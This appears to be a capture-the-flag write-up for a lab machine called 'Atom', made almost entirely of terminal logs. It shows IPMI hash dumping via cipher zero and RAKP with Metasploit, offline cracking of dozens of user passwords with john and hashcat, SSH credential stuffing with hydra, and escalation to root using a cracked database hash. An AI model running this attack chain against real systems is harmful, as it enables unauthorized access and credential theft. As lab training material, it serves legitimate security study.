

# Atom

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└─(root㉿kali)-[~/home/guel/Desktop]
# nmap -sS -p- -Pn -n -vvv 192.168.0.5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-17 23:45 EDT
Initiating ARP Ping Scan at 23:45
Scanning 192.168.0.5 [1 port]
Completed ARP Ping Scan at 23:45, 0.11s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 23:45
Scanning 192.168.0.5 [65535 ports]
Discovered open port 22/tcp on 192.168.0.5
Completed SYN Stealth Scan at 23:45, 30.11s elapsed (65535 total ports)
Nmap scan report for 192.168.0.5
Host is up, received arp-response (0.0034s latency).
Scanned at 2025-03-17 23:45:08 EDT for 30s
Not shown: 65534 closed tcp ports (reset)
PORT      STATE SERVICE REASON
22/tcp    open  ssh      syn-ack ttl 64
MAC Address: 08:00:27:59:93:CB (PCS Systemtechnik/Oracle VirtualBox vir

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 30.44 seconds
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└─(root㉿kali)-[~/home/guel/Desktop]
# nmap -sU -p- -Pn -n -vvv --min-rate 5000 192.168.0.5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 01:13 EDT
Initiating ARP Ping Scan at 01:13
Scanning 192.168.0.5 [1 port]
Completed ARP Ping Scan at 01:13, 0.09s elapsed (1 total hosts)
Initiating UDP Scan at 01:13
Scanning 192.168.0.5 [65535 ports]
Discovered open port 623/udp on 192.168.0.5
Increasing send delay for 192.168.0.5 from 0 to 50 due to 14 out of 16 dropped probes; si
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```
msf6 > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > options

Module options (auxiliary/scanner/ipmi/ipmi_cipher_zero):

Name      Current Setting  Required  Description
---      ---           ---           ---
BATCHSIZE 256           yes        The number of hosts to probe in each set
RHOSTS     192.168.0.5    yes        The target host(s), see https://docs.metasploit.com/
RPORT      623           yes        The target port (UDP)
THREADS    10            yes        The number of concurrent threads

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > set rhosts 192.168.0.5
rhosts => 192.168.0.5
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > run
[*] Sending IPMI requests to 192.168.0.5→192.168.0.5 (1 hosts)
[+] 192.168.0.5:623 - IPMI - VULNERABLE: Accepted a session open request for cipher zero
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) >
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```
msf6 auxiliary(scanner/ipmi/ipmi_dump hashes) > run
[+] 192.168.0.5:623 - IPMI - Hash found: admin:f215f6702020000cfef57d858535274711e5f9d37b65285458c53d51b5fd38526329118475865420a123456789abcdefa123456789abcd
ef140561646dd96e:6e4e47b2a3b4e12efffb8a90db00127d50b2a087a
[+] 192.168.0.5:623 - IPMI - Hash for user 'admin' matches password 'cukorborso'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

```
msf6 auxiliary(scanner/ipmi/ipmi_dump hashes) > run
[+] 192.168.0.5:623 - IPMI - Hash found: admin:d6631ba08206000080a6c385
[+] 192.168.0.5:623 - IPMI - Hash for user 'admin' matches password 'cukorbc
```

```
[root@kali]-[~/home/guel/Desktop]
# ipmitool -I lanplus -C 0 -H 192.168.0.5 -U admin -P cukorborso user list
ID  Name          Callin  Link Auth  IPMI Msg  Channel Priv Limit
1   admin         true    false     false      Unknown (0x00)
2   analiese      true    false     true       ADMINISTRATOR
3   briella       true    false     true       USER
4   richardson    true    false     true       USER
5   carsten       true    false     true       USER
6   sibylle       true    false     true       USER
8   wai-ching     true    false     true       USER
9   jerrilee      true    false     true       USER
10  glynn         true    false     true       USER
11  asia          true    false     true       USER
12  zaylen        true    false     true       USER
13  fabien        true    false     true       USER
14  merola        true    false     true       USER
15  jem           true    false     true       USER
16  riyaz          true   false     true       USER
17  laten          true   false     true       USER
18  cati          true   false     true       USER
19  rozalia        true   false     true       USER
20  palmer         true   false     true       USER
21  onida          true   false     true       USER
22  terra          true   false     true       USER
23  ranga          true   false     true       USER
24  harrie         true   false     true       USER
25  pauly          true   false     true       USER
26  els            true   false     true       USER
27  bqb             true   false     true       USER
28  karlotte       true   false     true       USER
29  zali            true   false     true       USER
30  ende            true   false     true       USER
31  stacey          true   false     true       USER
32  shirin         true   false     true       USER
33  kaki            true   false     true       USER
34  saman           true   false     true       USER
35  kalie           true   false     true       USER
36  deshawn         true   false     true       USER
37  mayeul          true   false     true       USER
38
```

```
[root@kali]-[/home/guel/Work]
# ipmitool -h
ipmitool version 1.8.19
```

Commands:	
raw	Send a RAW IPMI request and print response
i2c	Send an I2C Master Write-Read command and print response
spd	Print SPD info from remote I2C device
lan	Configure LAN Channels
chassis	Get chassis status and set power state
power	Shortcut to chassis power commands
event	Send pre-defined events to MC
mc	Management Controller status and global enables
sdr	Print Sensor Data Repository entries and readings
sensor	Print detailed sensor information
fru	Print built-in FRU and scan SDR for FRU locators
gendev	Read/Write Device associated with Generic Device locators
sel	Print System Event Log (SEL)
pef	Configure Platform Event Filtering (PEF)
sol	Configure and connect IPMIV2.0 Serial-over-LAN
tsol	Configure and connect with Tyan IPMIV1.5 Serial-over-LAN
isol	Configure IPMIV1.5 Serial-over-LAN
user	Configure Management Controller users
channel	Configure Management Controller channels
session	Print session information
dcmi	Data Center Management Interface
nm	Node Manager Interface
sunoem	OEM Commands for Sun servers
kontronoem	OEM Commands for Kontron devices
picmg	Run a PICMG/ATCA extended cmd
fwum	Update IPMC using Kontron OEM Firmware Update Manager
firewall	Configure Firmware Firewall
delloem	OEM Commands for Dell systems
shell	Launch interactive IPMI shell
exec	Run list of commands from file
set	Set runtime variable for shell and exec
hpm	Update HPM components using PICMG HPM.1 file
ekanalyzer	run FRU-Ekeying analyzer using FRU files

no sirvio para nada....

creo la lista de usuario para hacer dumphash con msfconsole

```

Matching modules
=====
# Name                               Disclosure Date   Rank    Check  Description
- auxiliary/scanner/ipmi/ipmi_dumphashes  2013-06-20      normal  No     IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval

Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/ipmi/ipmi_dumphashes

msf6 > use 0
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > options

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):
=====
Name          Current Setting       Required  Description
CRACK_COMMON   true                yes       Automatically crack common passwords as they are obtained
OUTPUT_HASHCAT_FILE  /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt  no        Save captured password hashes in hashcat format
OUTPUT_JOHN_FILE  /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt  no        Save captured password hashes in john the ripper format
PASS_FILE      /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt  yes      File containing common passwords for offline cracking, one per line
RHOSTS
RPORT          623                yes      The target host(s), see https://docs.metasploit.com/docs/sics/using-metasploit.html
SESSION_MAX_ATTEMPTS 5               yes      The target port
SESSION_RETRY_DELAY 5               yes      Maximum number of session retries, required on certain BIOS
THREADS         1               yes      Delay between session retries in seconds
USER_FILE       /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt  yes      The number of concurrent threads (max one per host)
                                         File containing usernames, one per line

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > setg rhosts192.168.0.5
rhosts192.168.0.5 =>
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set USER_FILE users.txt
USER_FILE => users.txt
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > 

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```

msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
[*] 192.168.0.5:623 - IPMI - Hash found: admin:3a:f6e7bd021400004e36d68a9d73d60f757cd80e7d8cf7c67815e7d2f76e29e5fc9a6704e0d2baf8a123456789abcrefa123456789abcd
ef10561646d96e:1d12d5d82d5949661284ce55d41abc3e2a1b
[*] 192.168.0.5:623 - IPMI - Hash for user 'admin' matches password 'cukorborso'
[*] 192.168.0.5:623 - IPMI - Hash found: analiese:917ba55384140000be12acc490f362b936a0d6045380008845c228b54ead740cd2f59ca0e8909a63a123456789abcrefa123456789a
bcdfe14086166616c69657365a375bfef13a4880e8f7342be242846270ab1a1e9
[*] 192.168.0.5:623 - IPMI - Hash found: brielle:a30e65d9b06150000be83926875ab73c2d9e4a021d4fd649c6a15bf004ff430020852868bed0071e0a123456789abcrefa123456789ab
cdfe140727269656c661:2875cbc5a423178b1f1289d834bbc90148e5c75c
[*] 192.168.0.5:623 - IPMI - Hash found: richardson:3ad2263988150000d7468f9ff3b6c03e470033ebcd3833420ef28695f63f26295a09dbbf80253e71ca123456789abcrefa12345678
9abcrefe140a72696368617264736f6e:2832f7775a300740b21c18d9310bfcf423cd7ec
[*] 192.168.0.5:623 - IPMI - Hash found: carsten:a31742160a10000027256cc642b9feddfc7320ddb156c5177ebbd3fac93c22f7238b1136067f2a79a123456789abcrefa123456789ab
cdfe14076361727374656e:9d8177e8cf3f795db47a994564feb28fcfd6d
[*] 192.168.0.5:623 - IPMI - Hash found: sibylle:6a48baed8c16000004e42c9dd483dbf00e28a628aa17e390d54fb246818ab4d5db01e801ddbb0ea123456789abcrefa123456789ab
cdfe1407736962796c6c65:2d9056a78ccb8ecdad0febi92273ec6484cba330
[*] 192.168.0.5:623 - IPMI - Hash found: wai-ching:cdb1fb950e170000609f3ba29e0356c1c40a0963af56fiae05490a0de9ca94c72fc763db42403fb3a123456789abcrefa123456789
abcrefe14097761692d6368969e67:ca67f447f1bf1e0d466b48a88079eb1d0bebe385
[*] 192.168.0.5:623 - IPMI - Hash found: jerrilee:66ceca2329017000004791a60cd0770ae2d73ed0a2fa60e287bb35a0fab583993d607e66c3c5cd2ea123456789abcrefa123456789a
bcdfe14086a657272696c6565:0da136bc5e624dfcbca694545df59196ab9b9256
[*] 192.168.0.5:623 - IPMI - Hash found: glynny:a01ff87121800005e378de78d36d71b3a228c7f84b3624257b6682b8716b920eebcbab20698dd7a123456789abcrefa123456789abcd
ef1405676c796e0e:36087dc41633363d1994afeb5118fc2295078887
[*] 192.168.0.5:623 - IPMI - Hash found: asia:b9170b7c94180000048b45bbe56293b919550a8f71780aead9fc5ab5ae4006782e658c8f737e7a123456789abcrefa123456789abcd
f140461736961:a5e1780ed377862ca36708eab8b7f895d40d1264cd
[*] 192.168.0.5:623 - IPMI - Hash found: zaylen:d502b6691619000011b0b040f2c5ce0572cb08532c073fd10d6d299826216235148bc946988d2931a123456789abcrefa123456789abcd
def14067a61796c656e:aed380c77ed68d86e7e26a1daab931902022623
[*] 192.168.0.5:623 - IPMI - Hash found: fabien:cc44196898190000bb2c75a0f36c3c8ddf9011d3fce007f520c52960571953c46e8cd964e9b2100ba123456789abcrefa123456789abcd
def140666616269656e:bf06d930d720ee41da97fa302a9d5c1e49474b6
[*] 192.168.0.5:623 - IPMI - Hash found: merola:b6d59d721a1a000006fb0606310c7fb8f3cd083+adca42cead7ea25e83c14ac5acb2f0c3b9575527a123456789abcrefa123456789abcd
def14066d65726f6c61:c59077e0597a107b178ddee6405fffe179d493b7
[*] 192.168.0.5:623 - IPMI - Hash found: jem:c8e7aad89c1a000001f798480f005bc772441163c2077d46eab02237af98d875153d40e5cdf280e7a123456789abcrefa123456789abcd
ef14036a656d:ee9c729648c5749fde2a2d19e87ce5d8fd2170f1
[*] 192.168.0.5:623 - IPMI - Hash found: riya:z:2176ebd81e1b0000d67e23fb26a3bbcd770e28ec5b70e132af7a12b2721b7f238ab0bfe9a5254d2a123456789abcrefa123456789abcd
ef1405726979617a:3f0dbd32120d9fb7bbc76ec138e2571fabd3357
[*] 192.168.0.5:623 - IPMI - Hash found: laten:01e6b221a1b000004bb81fce50ce4609e2aad6f0536468a05e12b00b4bc96f80eb5f66407236f9a123456789abcrefa123456789abcd
ef14056c6174656e:f151a93eb9bcd7317134675bb60afce4d7982
[*] 192.168.0.5:623 - IPMI - Hash found: cati:4ac71ad221c00033a9567bf89d5e515b81443c439f7559b20b0fc27d6d1204ce91209a96aaec4ea123456789abcrefa123456789abcd
f14046317469f:f3d4f7abd411bbd8b7bb217abacd712d0bf1a02
[*] 192.168.0.5:623 - IPMI - Hash found: rozalia:fd7d0e841c0000855368c2cc5869746330e3d0dd18f9db01f9d2d85bb5a19123925210f0a6f8ea123456789abcrefa123456789abcd
cdfe1407726f7a616c6961:a8781dbf419c07a4e8406a20edf1b25a75229
[*] 192.168.0.5:623 - IPMI - Hash found: palmer:cf01ab4261d00003ee3d89d35f93e42781ffbf022234800e0ea40033fa5b09b2f2b2034aa3b8bf49a123456789abcrefa123456789abcd
def140670616c6d6572:4f978d9936e69b1e41492d880aa7e1280a95194
[*] 192.168.0.5:623 - IPMI - Hash found: onida:5790d2bba81d0000d60b0a2609e8cec8e717bc4ad64c73edc1a0ba139fb61c7d9837063331b8a0da123456789abcrefa123456789abcd

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[root@kali)-[/home/guel/Work]
# john users_hashes.txt -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 36 password hashes with 36 different salts (RAKP, IPMI 2.0 RAKP (RMCP+) [HMAC
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
090506          (192.168.0.5 saman)
122987          (192.168.0.5 cati)
290992          (192.168.0.5 bqbg)
jesus06          (192.168.0.5 briella)
120691          (192.168.0.5 zaylen)
emeralds         (192.168.0.5 karlotte)
milo123         (192.168.0.5 deshawn)
515253          (192.168.0.5 pauly)
honda            (192.168.0.5 analiese)
2468             (192.168.0.5 carsten)
batman!          (192.168.0.5 rozalia)
TWEETY1          (192.168.0.5 asia)
jiggaman         (192.168.0.5 onida)
sexymoma         (192.168.0.5 terra)
darell           (192.168.0.5 richardson)
evan              (192.168.0.5 glynn)
numberone        (192.168.0.5 kaki)
081704          (192.168.0.5 jem)
071590          (192.168.0.5 harrie)
me4life          (192.168.0.5 sibylle)
phones            (192.168.0.5 palmer)
castillo1        (192.168.0.5 stacey)
billandben       (192.168.0.5 kalie)
tripod            (192.168.0.5 ende)
trick1            (192.168.0.5 laten)
mackenzie2       (192.168.0.5 merola)
jaffa1            (192.168.0.5 ranga)
241107            (192.168.0.5 mayeul)
chatroom          (192.168.0.5 fabien)
djones            (192.168.0.5 riyaz)
number17          (192.168.0.5 jerrilee)
kittyboo          (192.168.0.5 shirin)
10101979         (192.168.0.5 wai-ching)
dezzy             (192.168.0.5 els)
poynter           (192.168.0.5 zali)
cukorborso        (192.168.0.5 admin)
```

```

└─(root㉿kali)-[~/home/guel/Work]
# hydra -C up.txt ssh://192.168.0.5 -v
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for
binding, these *** ignore laws and ethics anyway.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-18 14:46:14
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 35 login tries, ~3 tries per task
[DATA] attacking ssh://192.168.0.5:22
[ATTEMPT] target 192.168.0.5 - login "saman" - pass "090506" - 1 of 35 [child 0] (0/0)
[ATTEMPT] target 192.168.0.5 - login "cati" - pass "122987" - 2 of 35 [child 1] (0/0)
[ATTEMPT] target 192.168.0.5 - login "bqb" - pass "290992" - 3 of 35 [child 2] (0/0)
[ATTEMPT] target 192.168.0.5 - login "briella" - pass "jesus06" - 4 of 35 [child 3] (0/0)
[ATTEMPT] target 192.168.0.5 - login "zaylen" - pass "120691" - 5 of 35 [child 4] (0/0)
[ATTEMPT] target 192.168.0.5 - login "karlotte" - pass "emeralds" - 6 of 35 [child 5] (0/0)
[ATTEMPT] target 192.168.0.5 - login "deshawn" - pass "milo123" - 7 of 35 [child 6] (0/0)
[ATTEMPT] target 192.168.0.5 - login "pauly" - pass "515253" - 8 of 35 [child 7] (0/0)
[ATTEMPT] target 192.168.0.5 - login "analiese" - pass "honda" - 9 of 35 [child 8] (0/0)
[ATTEMPT] target 192.168.0.5 - login "carsten" - pass "2468" - 10 of 35 [child 9] (0/0)
[ATTEMPT] target 192.168.0.5 - login "rozalia" - pass "batman!" - 11 of 35 [child 10] (0/0)
[ATTEMPT] target 192.168.0.5 - login "asia" - pass "TWEETY1" - 12 of 35 [child 11] (0/0)
[ATTEMPT] target 192.168.0.5 - login "onida" - pass "jiggaman" - 13 of 35 [child 12] (0/0)
[ATTEMPT] target 192.168.0.5 - login "terra" - pass "sexymoma" - 14 of 35 [child 13] (0/0)
[ATTEMPT] target 192.168.0.5 - login "richardson" - pass "darell" - 15 of 35 [child 14] (0/0)
[ATTEMPT] target 192.168.0.5 - login "glynn" - pass "evan" - 16 of 35 [child 15] (0/0)
[22][ssh] host: 192.168.0.5 login: onida password: jiggaman
[ATTEMPT] target 192.168.0.5 - login "kaki" - pass "numberone" - 17 of 38 [child 12] (0/3)
[ATTEMPT] target 192.168.0.5 - login "jem" - pass "081704" - 18 of 38 [child 8] (0/3)
[ATTEMPT] target 192.168.0.5 - login "harrie" - pass "071590" - 19 of 38 [child 4] (0/3)
[RE-ATTEMPT] target 192.168.0.5 - login "sibylle" - pass "081704" - 19 of 38 [child 8] (0/3)
[RE-ATTEMPT] target 192.168.0.5 - login "sibylle" - pass "071590" - 19 of 38 [child 4] (0/3)
[ATTEMPT] target 192.168.0.5 - login "sibylle" - pass "me4life" - 20 of 38 [child 0] (0/3)
[ATTEMPT] target 192.168.0.5 - login "palmer" - pass "phones" - 21 of 38 [child 7] (0/3)
[ATTEMPT] target 192.168.0.5 - login "stacey" - pass "castillo1" - 22 of 38 [child 1] (0/3)
[ATTEMPT] target 192.168.0.5 - login "kalie" - pass "billandben" - 23 of 38 [child 12] (0/3)
[ATTEMPT] target 192.168.0.5 - login "ende" - pass "tripod" - 24 of 38 [child 5] (0/3)

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└─(root㉿kali)-[~/home/guel/Work]
# ssh onida@192.168.0.5
onida@192.168.0.5's password:
Linux atom 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/*copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
onida@atom:~$ id
uid=1000(onida) gid=1000(onida) groups=1000(onida),100(users)
onida@atom:~$ 

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onida@atom:/var/www/html$ ls
atom-2400-database.db  css  img  index.php  js  login.php  profile.php  register.php  video
onida@atom:/var/www/html$ cat atom-2400-database.db
Q♦Y*&♦♦mtableusersusersCREATE TABLE users (
    id INTEGER PRIMARY KEY,
    username TEXT UNIQUE NOT NULL,
    password TEXT NOT NULL
))=indexsqlite_autoindex_users_1user*))♦tablelogin_attemptslogin_attemptsCREATE TABLE login_attempts (
    id INTEGER PRIMARY KEY,
    ip_address TEXT NOT NULL,
    attempt_time INTEGER NOT NULL
♦♦K♦atom$2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohY0iBQqG7pK1F2fH9Cm
♦♦♦      atom

onida@atom:/var/www/html$ 

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```
$2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohY0iBQqG7pK1F2fH9Cm:madison

Session.....: hashcat
Status.....: Cracked
Hash.Mode....: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target...: $2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohY0iBQqG7p ... 2fH9Cm
Time.Started...: Tue Mar 18 14:56:02 2025 (14 secs)
Time.Estimated ...: Tue Mar 18 14:56:16 2025 (0 secs)
Kernel.Feature ...: Pure Kernel
Guess.Base.....: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue.....: 1/1 (100.00%)
Speed.#1.....: 15 H/s (2.67ms) @ Accel:4 Loops:4 Thr:1 Vec:1
Recovered.....: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.....: 208/14344385 (0.00%)
Rejected.....: 0/208 (0.00%)
Restore.Point...: 192/14344385 (0.00%)
```

```
onida@atom:/var/www/html$ su root
Password:
root@atom:/var/www/html# qhoami
bash: qhoami: command not found
root@atom:/var/www/html# whoami
root
root@atom:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@atom:/var/www/html#
```